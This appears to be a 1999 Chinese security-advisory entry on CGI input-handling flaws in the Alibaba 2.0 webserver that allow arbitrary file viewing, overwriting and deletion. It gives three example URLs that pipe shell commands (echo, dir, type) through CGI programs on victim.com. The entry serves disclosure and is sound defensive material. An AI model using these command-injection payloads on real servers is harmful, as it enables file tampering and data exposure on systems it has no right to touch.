首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第3期->最新漏洞
期刊号: 类型: 关键词:
Alibaba 多种 CGI 漏洞

日期:1999-11-15

漏洞类型:远程、本地

发布日期:1999-11-03
更新日期:1999-11-04

影响系统:
   Computer Software Manufaktur Alibaba 2.0


漏洞描述:

     Alibaba webserver因为没有正确处理输入问题,其结果可以让攻击者在此服务器上查看、覆盖、创建和删除任何文件。
漏洞实例:

http ://victim.com/cgi-bin/get32.exe|echo%20>c:\file.txt
覆盖file.txt文件,get32.exe程序也允许在任何可执行文件中写入代码。
http ://www.victim.com/cgi-bin/alibaba.pl|dir
给出CGI目录的列表
http ://www.victim.com/cgi-bin/tst.bat|type%20c:\file.txt
列出file.txt的内容


版权所有,未经许可,不得转载